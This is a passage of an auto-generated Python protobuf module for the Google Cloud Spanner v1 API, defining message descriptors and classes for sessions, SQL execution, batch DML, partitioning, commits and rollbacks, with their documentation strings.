serialized_end=4153,
)
_BEGINTRANSACTIONREQUEST = _descriptor.Descriptor(
name="BeginTransactionRequest",
full_name="google.spanner.v1.BeginTransactionRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.BeginTransactionRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="options",
full_name="google.spanner.v1.BeginTransactionRequest.options",
index=1,
number=2,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4156,
serialized_end=4299,
)
_COMMITREQUEST = _descriptor.Descriptor(
name="CommitRequest",
full_name="google.spanner.v1.CommitRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.CommitRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction_id",
full_name="google.spanner.v1.CommitRequest.transaction_id",
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="single_use_transaction",
full_name="google.spanner.v1.CommitRequest.single_use_transaction",
index=2,
number=3,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="mutations",
full_name="google.spanner.v1.CommitRequest.mutations",
index=3,
number=4,
type=11,
cpp_type=10,
label=3,
has_default_value=False,
default_value=[],
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name="transaction",
full_name="google.spanner.v1.CommitRequest.transaction",
index=0,
containing_type=None,
fields=[],
)
],
serialized_start=4302,
serialized_end=4536,
)
_COMMITRESPONSE = _descriptor.Descriptor(
name="CommitResponse",
full_name="google.spanner.v1.CommitResponse",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="commit_timestamp",
full_name="google.spanner.v1.CommitResponse.commit_timestamp",
index=0,
number=1,
type=11,
cpp_type=10,
label=1,
has_default_value=False,
default_value=None,
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=None,
file=DESCRIPTOR,
)
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4538,
serialized_end=4608,
)
_ROLLBACKREQUEST = _descriptor.Descriptor(
name="RollbackRequest",
full_name="google.spanner.v1.RollbackRequest",
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name="session",
full_name="google.spanner.v1.RollbackRequest.session",
index=0,
number=1,
type=9,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b("").decode("utf-8"),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b(
"\340A\002\372A \n\036spanner.googleapis.com/Session"
),
file=DESCRIPTOR,
),
_descriptor.FieldDescriptor(
name="transaction_id",
full_name="google.spanner.v1.RollbackRequest.transaction_id",
index=1,
number=2,
type=12,
cpp_type=9,
label=1,
has_default_value=False,
default_value=_b(""),
message_type=None,
enum_type=None,
containing_type=None,
is_extension=False,
extension_scope=None,
serialized_options=_b("\340A\002"),
file=DESCRIPTOR,
),
],
extensions=[],
nested_types=[],
enum_types=[],
serialized_options=None,
is_extendable=False,
syntax="proto3",
extension_ranges=[],
oneofs=[],
serialized_start=4610,
serialized_end=4713,
)
_CREATESESSIONREQUEST.fields_by_name["session"].message_type = _SESSION
_BATCHCREATESESSIONSREQUEST.fields_by_name["session_template"].message_type = _SESSION
_BATCHCREATESESSIONSRESPONSE.fields_by_name["session"].message_type = _SESSION
_SESSION_LABELSENTRY.containing_type = _SESSION
_SESSION.fields_by_name["labels"].message_type = _SESSION_LABELSENTRY
_SESSION.fields_by_name[
"create_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_SESSION.fields_by_name[
"approximate_last_use_time"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
_LISTSESSIONSRESPONSE.fields_by_name["sessions"].message_type = _SESSION
_EXECUTESQLREQUEST_QUERYOPTIONS.containing_type = _EXECUTESQLREQUEST
_EXECUTESQLREQUEST_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_EXECUTESQLREQUEST_PARAMTYPESENTRY.containing_type = _EXECUTESQLREQUEST
_EXECUTESQLREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_EXECUTESQLREQUEST.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_EXECUTESQLREQUEST.fields_by_name[
"param_types"
].message_type = _EXECUTESQLREQUEST_PARAMTYPESENTRY
_EXECUTESQLREQUEST.fields_by_name["query_mode"].enum_type = _EXECUTESQLREQUEST_QUERYMODE
_EXECUTESQLREQUEST.fields_by_name[
"query_options"
].message_type = _EXECUTESQLREQUEST_QUERYOPTIONS
_EXECUTESQLREQUEST_QUERYMODE.containing_type = _EXECUTESQLREQUEST
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY.containing_type = (
_EXECUTEBATCHDMLREQUEST_STATEMENT
)
_EXECUTEBATCHDMLREQUEST_STATEMENT.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_EXECUTEBATCHDMLREQUEST_STATEMENT.fields_by_name[
"param_types"
].message_type = _EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY
_EXECUTEBATCHDMLREQUEST_STATEMENT.containing_type = _EXECUTEBATCHDMLREQUEST
_EXECUTEBATCHDMLREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_EXECUTEBATCHDMLREQUEST.fields_by_name[
"statements"
].message_type = _EXECUTEBATCHDMLREQUEST_STATEMENT
_EXECUTEBATCHDMLRESPONSE.fields_by_name[
"result_sets"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_result__set__pb2._RESULTSET
)
_EXECUTEBATCHDMLRESPONSE.fields_by_name[
"status"
].message_type = google_dot_rpc_dot_status__pb2._STATUS
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY.fields_by_name[
"value"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_type__pb2._TYPE
_PARTITIONQUERYREQUEST_PARAMTYPESENTRY.containing_type = _PARTITIONQUERYREQUEST
_PARTITIONQUERYREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_PARTITIONQUERYREQUEST.fields_by_name[
"params"
].message_type = google_dot_protobuf_dot_struct__pb2._STRUCT
_PARTITIONQUERYREQUEST.fields_by_name[
"param_types"
].message_type = _PARTITIONQUERYREQUEST_PARAMTYPESENTRY
_PARTITIONQUERYREQUEST.fields_by_name[
"partition_options"
].message_type = _PARTITIONOPTIONS
_PARTITIONREADREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_PARTITIONREADREQUEST.fields_by_name[
"key_set"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2._KEYSET
_PARTITIONREADREQUEST.fields_by_name[
"partition_options"
].message_type = _PARTITIONOPTIONS
_PARTITIONRESPONSE.fields_by_name["partitions"].message_type = _PARTITION
_PARTITIONRESPONSE.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTION
)
_READREQUEST.fields_by_name[
"transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONSELECTOR
)
_READREQUEST.fields_by_name[
"key_set"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_keys__pb2._KEYSET
_BEGINTRANSACTIONREQUEST.fields_by_name[
"options"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONOPTIONS
)
_COMMITREQUEST.fields_by_name[
"single_use_transaction"
].message_type = (
google_dot_cloud_dot_spanner__v1_dot_proto_dot_transaction__pb2._TRANSACTIONOPTIONS
)
_COMMITREQUEST.fields_by_name[
"mutations"
].message_type = google_dot_cloud_dot_spanner__v1_dot_proto_dot_mutation__pb2._MUTATION
_COMMITREQUEST.oneofs_by_name["transaction"].fields.append(
_COMMITREQUEST.fields_by_name["transaction_id"]
)
_COMMITREQUEST.fields_by_name[
"transaction_id"
].containing_oneof = _COMMITREQUEST.oneofs_by_name["transaction"]
_COMMITREQUEST.oneofs_by_name["transaction"].fields.append(
_COMMITREQUEST.fields_by_name["single_use_transaction"]
)
_COMMITREQUEST.fields_by_name[
"single_use_transaction"
].containing_oneof = _COMMITREQUEST.oneofs_by_name["transaction"]
_COMMITRESPONSE.fields_by_name[
"commit_timestamp"
].message_type = google_dot_protobuf_dot_timestamp__pb2._TIMESTAMP
DESCRIPTOR.message_types_by_name["CreateSessionRequest"] = _CREATESESSIONREQUEST
DESCRIPTOR.message_types_by_name[
"BatchCreateSessionsRequest"
] = _BATCHCREATESESSIONSREQUEST
DESCRIPTOR.message_types_by_name[
"BatchCreateSessionsResponse"
] = _BATCHCREATESESSIONSRESPONSE
DESCRIPTOR.message_types_by_name["Session"] = _SESSION
DESCRIPTOR.message_types_by_name["GetSessionRequest"] = _GETSESSIONREQUEST
DESCRIPTOR.message_types_by_name["ListSessionsRequest"] = _LISTSESSIONSREQUEST
DESCRIPTOR.message_types_by_name["ListSessionsResponse"] = _LISTSESSIONSRESPONSE
DESCRIPTOR.message_types_by_name["DeleteSessionRequest"] = _DELETESESSIONREQUEST
DESCRIPTOR.message_types_by_name["ExecuteSqlRequest"] = _EXECUTESQLREQUEST
DESCRIPTOR.message_types_by_name["ExecuteBatchDmlRequest"] = _EXECUTEBATCHDMLREQUEST
DESCRIPTOR.message_types_by_name["ExecuteBatchDmlResponse"] = _EXECUTEBATCHDMLRESPONSE
DESCRIPTOR.message_types_by_name["PartitionOptions"] = _PARTITIONOPTIONS
DESCRIPTOR.message_types_by_name["PartitionQueryRequest"] = _PARTITIONQUERYREQUEST
DESCRIPTOR.message_types_by_name["PartitionReadRequest"] = _PARTITIONREADREQUEST
DESCRIPTOR.message_types_by_name["Partition"] = _PARTITION
DESCRIPTOR.message_types_by_name["PartitionResponse"] = _PARTITIONRESPONSE
DESCRIPTOR.message_types_by_name["ReadRequest"] = _READREQUEST
DESCRIPTOR.message_types_by_name["BeginTransactionRequest"] = _BEGINTRANSACTIONREQUEST
DESCRIPTOR.message_types_by_name["CommitRequest"] = _COMMITREQUEST
DESCRIPTOR.message_types_by_name["CommitResponse"] = _COMMITRESPONSE
DESCRIPTOR.message_types_by_name["RollbackRequest"] = _ROLLBACKREQUEST
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CreateSessionRequest = _reflection.GeneratedProtocolMessageType(
"CreateSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_CREATESESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[CreateSession][google.spanner.v1.Spanner.CreateSession].
Attributes:
database:
Required. The database in which the new session is created.
session:
The session to create.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.CreateSessionRequest)
),
)
_sym_db.RegisterMessage(CreateSessionRequest)
BatchCreateSessionsRequest = _reflection.GeneratedProtocolMessageType(
"BatchCreateSessionsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_BATCHCREATESESSIONSREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[BatchCreateSessions][google.spanner.v1.Spanner.BatchCreateSessions].
Attributes:
database:
Required. The database in which the new sessions are created.
session_template:
Parameters to be applied to each created session.
session_count:
Required. The number of sessions to be created in this batch
call. The API may return fewer than the requested number of
sessions. If a specific number of sessions are desired, the
client can make additional calls to BatchCreateSessions
(adjusting [session\_count][google.spanner.v1.BatchCreateSessi
onsRequest.session\_count] as necessary).
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BatchCreateSessionsRequest)
),
)
_sym_db.RegisterMessage(BatchCreateSessionsRequest)
BatchCreateSessionsResponse = _reflection.GeneratedProtocolMessageType(
"BatchCreateSessionsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_BATCHCREATESESSIONSRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[BatchCreateSessions][google.spanner.v1.Spanner.BatchCreateSessions].
Attributes:
session:
The freshly created sessions.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.BatchCreateSessionsResponse)
),
)
_sym_db.RegisterMessage(BatchCreateSessionsResponse)
Session = _reflection.GeneratedProtocolMessageType(
"Session",
(_message.Message,),
dict(
LabelsEntry=_reflection.GeneratedProtocolMessageType(
"LabelsEntry",
(_message.Message,),
dict(
DESCRIPTOR=_SESSION_LABELSENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.Session.LabelsEntry)
),
),
DESCRIPTOR=_SESSION,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""A session in the Cloud Spanner API.
Attributes:
name:
The name of the session. This is always system-assigned;
values provided when creating a session are ignored.
labels:
The labels for the session. - Label keys must be between 1
and 63 characters long and must conform to the following
regular expression: ``[a-z]([-a-z0-9]*[a-z0-9])?``. - Label
values must be between 0 and 63 characters long and must
conform to the regular expression
``([a-z]([-a-z0-9]*[a-z0-9])?)?``. - No more than 64 labels
can be associated with a given session. See
https://goo.gl/xmQnxf for more information on and examples of
labels.
create_time:
Output only. The timestamp when the session is created.
approximate_last_use_time:
Output only. The approximate timestamp when the session is
last used. It is typically earlier than the actual last use
time.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.Session)
),
)
_sym_db.RegisterMessage(Session)
_sym_db.RegisterMessage(Session.LabelsEntry)
GetSessionRequest = _reflection.GeneratedProtocolMessageType(
"GetSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_GETSESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[GetSession][google.spanner.v1.Spanner.GetSession].
Attributes:
name:
Required. The name of the session to retrieve.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.GetSessionRequest)
),
)
_sym_db.RegisterMessage(GetSessionRequest)
ListSessionsRequest = _reflection.GeneratedProtocolMessageType(
"ListSessionsRequest",
(_message.Message,),
dict(
DESCRIPTOR=_LISTSESSIONSREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ListSessions][google.spanner.v1.Spanner.ListSessions].
Attributes:
database:
Required. The database in which to list sessions.
page_size:
Number of sessions to be returned in the response. If 0 or
less, defaults to the server's maximum allowed page size.
page_token:
If non-empty, ``page_token`` should contain a [next\_page\_tok
en][google.spanner.v1.ListSessionsResponse.next\_page\_token]
from a previous [ListSessionsResponse][google.spanner.v1.ListS
essionsResponse].
filter:
An expression for filtering the results of the request. Filter
rules are case insensitive. The fields eligible for filtering
are: - ``labels.key`` where key is the name of a label Some
examples of using filters are: - ``labels.env:*`` --> The
session has the label "env". - ``labels.env:dev`` --> The
session has the label "env" and the value of the label
contains the string "dev".
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ListSessionsRequest)
),
)
_sym_db.RegisterMessage(ListSessionsRequest)
ListSessionsResponse = _reflection.GeneratedProtocolMessageType(
"ListSessionsResponse",
(_message.Message,),
dict(
DESCRIPTOR=_LISTSESSIONSRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[ListSessions][google.spanner.v1.Spanner.ListSessions].
Attributes:
sessions:
The list of requested sessions.
next_page_token:
\ ``next_page_token`` can be sent in a subsequent
[ListSessions][google.spanner.v1.Spanner.ListSessions] call to
fetch more of the matching sessions.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ListSessionsResponse)
),
)
_sym_db.RegisterMessage(ListSessionsResponse)
DeleteSessionRequest = _reflection.GeneratedProtocolMessageType(
"DeleteSessionRequest",
(_message.Message,),
dict(
DESCRIPTOR=_DELETESESSIONREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[DeleteSession][google.spanner.v1.Spanner.DeleteSession].
Attributes:
name:
Required. The name of the session to delete.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.DeleteSessionRequest)
),
)
_sym_db.RegisterMessage(DeleteSessionRequest)
ExecuteSqlRequest = _reflection.GeneratedProtocolMessageType(
"ExecuteSqlRequest",
(_message.Message,),
dict(
QueryOptions=_reflection.GeneratedProtocolMessageType(
"QueryOptions",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTESQLREQUEST_QUERYOPTIONS,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Query optimizer configuration.
Attributes:
optimizer_version:
An option to control the selection of optimizer version. This
parameter allows individual queries to pick different query
optimizer versions. Specifying "latest" as a value instructs
Cloud Spanner to use the latest supported query optimizer
version. If not specified, Cloud Spanner uses optimizer
version set at the database level options. Any other positive
integer (from the list of supported optimizer versions)
overrides the default optimizer version for query execution.
The list of supported optimizer versions can be queried from
SPANNER\_SYS.SUPPORTED\_OPTIMIZER\_VERSIONS. Executing a SQL
statement with an invalid optimizer version will fail with a
syntax error (``INVALID_ARGUMENT``) status. The
``optimizer_version`` statement hint has precedence over this
setting.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest.QueryOptions)
),
),
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTESQLREQUEST_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest.ParamTypesEntry)
),
),
DESCRIPTOR=_EXECUTESQLREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ExecuteSql][google.spanner.v1.Spanner.ExecuteSql] and
[ExecuteStreamingSql][google.spanner.v1.Spanner.ExecuteStreamingSql].
Attributes:
session:
Required. The session in which the SQL query should be
performed.
transaction:
The transaction to use. For queries, if none is provided, the
default is a temporary read-only transaction with strong
concurrency. Standard DML statements require a read-write
transaction. To protect against replays, single-use
transactions are not supported. The caller must either supply
an existing transaction ID or begin a new transaction.
Partitioned DML requires an existing Partitioned DML
transaction ID.
sql:
Required. The SQL string.
params:
Parameter names and values that bind to placeholders in the
SQL string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in
[params][google.spanner.v1.ExecuteSqlRequest.params] as JSON
strings. In these cases, ``param_types`` can be used to
specify the exact SQL type for some or all of the SQL
statement parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
resume_token:
If this request is resuming a previously interrupted SQL
statement execution, ``resume_token`` should be copied from
the last
[PartialResultSet][google.spanner.v1.PartialResultSet] yielded
before the interruption. Doing this enables the new SQL
statement execution to resume where the last one left off. The
rest of the request parameters must exactly match the request
that yielded this token.
query_mode:
Used to control the amount of debugging information returned
in [ResultSetStats][google.spanner.v1.ResultSetStats]. If [par
tition\_token][google.spanner.v1.ExecuteSqlRequest.partition\_
token] is set,
[query\_mode][google.spanner.v1.ExecuteSqlRequest.query\_mode]
can only be set to [QueryMode.NORMAL][google.spanner.v1.Execut
eSqlRequest.QueryMode.NORMAL].
partition_token:
If present, results will be restricted to the specified
partition previously created using PartitionQuery(). There
must be an exact match for the values of fields common to this
message and the PartitionQueryRequest message used to create
this partition\_token.
seqno:
A per-transaction sequence number used to identify this
request. This field makes each request idempotent such that if
the request is received multiple times, at most one will
succeed. The sequence number must be monotonically increasing
within the transaction. If a request arrives for the first
time with an out-of-order sequence number, the transaction may
be aborted. Replays of previously handled requests will yield
the same response as the first execution. Required for DML
statements. Ignored for queries.
query_options:
Query optimizer configuration to use for the given query.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteSqlRequest)
),
)
_sym_db.RegisterMessage(ExecuteSqlRequest)
_sym_db.RegisterMessage(ExecuteSqlRequest.QueryOptions)
_sym_db.RegisterMessage(ExecuteSqlRequest.ParamTypesEntry)
ExecuteBatchDmlRequest = _reflection.GeneratedProtocolMessageType(
"ExecuteBatchDmlRequest",
(_message.Message,),
dict(
Statement=_reflection.GeneratedProtocolMessageType(
"Statement",
(_message.Message,),
dict(
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST_STATEMENT_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest.Statement.ParamTypesEntry)
),
),
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST_STATEMENT,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""A single DML statement.
Attributes:
sql:
Required. The DML string.
params:
Parameter names and values that bind to placeholders in the
DML string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
It is not always possible for Cloud Spanner to infer the right
SQL type from a JSON value. For example, values of type
``BYTES`` and values of type ``STRING`` both appear in [params
][google.spanner.v1.ExecuteBatchDmlRequest.Statement.params]
as JSON strings. In these cases, ``param_types`` can be used
to specify the exact SQL type for some or all of the SQL
statement parameters. See the definition of
[Type][google.spanner.v1.Type] for more information about SQL
types.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest.Statement)
),
),
DESCRIPTOR=_EXECUTEBATCHDMLREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[ExecuteBatchDml][google.spanner.v1.Spanner.ExecuteBatchDml].
Attributes:
session:
Required. The session in which the DML statements should be
performed.
transaction:
Required. The transaction to use. Must be a read-write
transaction. To protect against replays, single-use
transactions are not supported. The caller must either supply
an existing transaction ID or begin a new transaction.
statements:
Required. The list of statements to execute in this batch.
Statements are executed serially, such that the effects of
statement ``i`` are visible to statement ``i+1``. Each
statement must be a DML statement. Execution stops at the
first failed statement; the remaining statements are not
executed. Callers must provide at least one statement.
seqno:
Required. A per-transaction sequence number used to identify
this request. This field makes each request idempotent such
that if the request is received multiple times, at most one
will succeed. The sequence number must be monotonically
increasing within the transaction. If a request arrives for
the first time with an out-of-order sequence number, the
transaction may be aborted. Replays of previously handled
requests will yield the same response as the first execution.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlRequest)
),
)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest.Statement)
_sym_db.RegisterMessage(ExecuteBatchDmlRequest.Statement.ParamTypesEntry)
ExecuteBatchDmlResponse = _reflection.GeneratedProtocolMessageType(
"ExecuteBatchDmlResponse",
(_message.Message,),
dict(
DESCRIPTOR=_EXECUTEBATCHDMLRESPONSE,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The response for
[ExecuteBatchDml][google.spanner.v1.Spanner.ExecuteBatchDml]. Contains a
list of [ResultSet][google.spanner.v1.ResultSet] messages, one for each
DML statement that has successfully executed, in the same order as the
statements in the request. If a statement fails, the status in the
response body identifies the cause of the failure.
To check for DML statements that failed, use the following approach:
1. Check the status in the response message. The
[google.rpc.Code][google.rpc.Code] enum value ``OK`` indicates that
all statements were executed successfully.
2. If the status was not ``OK``, check the number of result sets in the
response. If the response contains ``N``
[ResultSet][google.spanner.v1.ResultSet] messages, then statement
``N+1`` in the request failed.
Example 1:
- Request: 5 DML statements, all executed successfully.
- Response: 5 [ResultSet][google.spanner.v1.ResultSet] messages, with
the status ``OK``.
Example 2:
- Request: 5 DML statements. The third statement has a syntax error.
- Response: 2 [ResultSet][google.spanner.v1.ResultSet] messages, and a
syntax error (``INVALID_ARGUMENT``) status. The number of
[ResultSet][google.spanner.v1.ResultSet] messages indicates that the
third statement failed, and the fourth and fifth statements were not
executed.
Attributes:
result_sets:
One [ResultSet][google.spanner.v1.ResultSet] for each
statement in the request that ran successfully, in the same
order as the statements in the request. Each
[ResultSet][google.spanner.v1.ResultSet] does not contain any
rows. The [ResultSetStats][google.spanner.v1.ResultSetStats]
in each [ResultSet][google.spanner.v1.ResultSet] contain the
number of rows modified by the statement. Only the first
[ResultSet][google.spanner.v1.ResultSet] in the response
contains valid
[ResultSetMetadata][google.spanner.v1.ResultSetMetadata].
status:
If all DML statements are executed successfully, the status is
``OK``. Otherwise, the error status of the first failed
statement.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.ExecuteBatchDmlResponse)
),
)
_sym_db.RegisterMessage(ExecuteBatchDmlResponse)
PartitionOptions = _reflection.GeneratedProtocolMessageType(
"PartitionOptions",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONOPTIONS,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""Options for a PartitionQueryRequest and
PartitionReadRequest.
Attributes:
partition_size_bytes:
\ **Note:** This hint is currently ignored by PartitionQuery
and PartitionRead requests. The desired data size for each
partition generated. The default for this option is currently
1 GiB. This is only a hint. The actual size of each partition
may be smaller or larger than this size request.
max_partitions:
\ **Note:** This hint is currently ignored by PartitionQuery
and PartitionRead requests. The desired maximum number of
partitions to return. For example, this may be set to the
number of workers available. The default for this option is
currently 10,000. The maximum value is currently 200,000. This
is only a hint. The actual number of partitions returned may
be smaller or larger than this maximum count request.
""",
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionOptions)
),
)
_sym_db.RegisterMessage(PartitionOptions)
PartitionQueryRequest = _reflection.GeneratedProtocolMessageType(
"PartitionQueryRequest",
(_message.Message,),
dict(
ParamTypesEntry=_reflection.GeneratedProtocolMessageType(
"ParamTypesEntry",
(_message.Message,),
dict(
DESCRIPTOR=_PARTITIONQUERYREQUEST_PARAMTYPESENTRY,
__module__="google.cloud.spanner_v1.proto.spanner_pb2"
# @@protoc_insertion_point(class_scope:google.spanner.v1.PartitionQueryRequest.ParamTypesEntry)
),
),
DESCRIPTOR=_PARTITIONQUERYREQUEST,
__module__="google.cloud.spanner_v1.proto.spanner_pb2",
__doc__="""The request for
[PartitionQuery][google.spanner.v1.Spanner.PartitionQuery]
Attributes:
session:
Required. The session used to create the partitions.
transaction:
Read only snapshot transactions are supported, read/write and
single use transactions are not.
sql:
Required. The query request to generate partitions for. The
request will fail if the query is not root partitionable. The
query plan of a root partitionable query has a single
distributed union operator. A distributed union operator
conceptually divides one or more tables into multiple splits,
remotely evaluates a subquery independently on each split, and
then unions all results. This must not contain DML commands,
such as INSERT, UPDATE, or DELETE. Use [ExecuteStreamingSql][g
oogle.spanner.v1.Spanner.ExecuteStreamingSql] with a
PartitionedDml transaction for large, partition-friendly DML
operations.
params:
Parameter names and values that bind to placeholders in the
SQL string. A parameter placeholder consists of the ``@``
character followed by the parameter name (for example,
``@firstName``). Parameter names can contain letters, numbers,
and underscores. Parameters can appear anywhere that a
literal value is expected. The same parameter name can be used
more than once, for example: ``"WHERE id > @msg_id AND id <
@msg_id + 100"`` It is an error to execute a SQL statement
with unbound parameters.
param_types:
